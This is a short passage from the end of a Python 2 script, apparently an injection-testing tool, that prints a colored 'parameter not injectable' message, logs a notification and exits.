print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
else:
logs.logs_notification(filename)
sys.exit(0)
#eof